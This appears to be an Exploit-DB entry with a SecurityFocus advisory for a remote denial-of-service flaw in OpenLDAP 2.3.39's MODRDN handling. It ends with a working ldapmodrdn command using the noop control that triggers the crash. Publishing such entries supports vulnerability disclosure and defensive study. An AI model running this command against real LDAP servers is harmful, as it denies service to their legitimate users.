OpenLDAP 2.3.39 - MODRDN Remote Denial of Service

EDB-ID:

10077

CVE:

N/A


Platform:

Multiple

Published:

2009-11-09

Attackers use readily available LDAP commands to exploit this issue.



source: http://www.securityfocus.com/bid/27778/info

OpenLDAP is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to deny service to legitimate users.

OpenLDAP 2.3.39 is vulnerable to this issue; other versions may also be affected.

This issue is related to one described in BID 26245 (OpenLDAP Multiple Remote Denial of Service Vulnerabilities), identified by CVE-2007-6698.

ldapmodrdn -x -h :389 -D <dn> -w <pw> -e \noop ou=test,dc=my-domain,dc=com ou=test2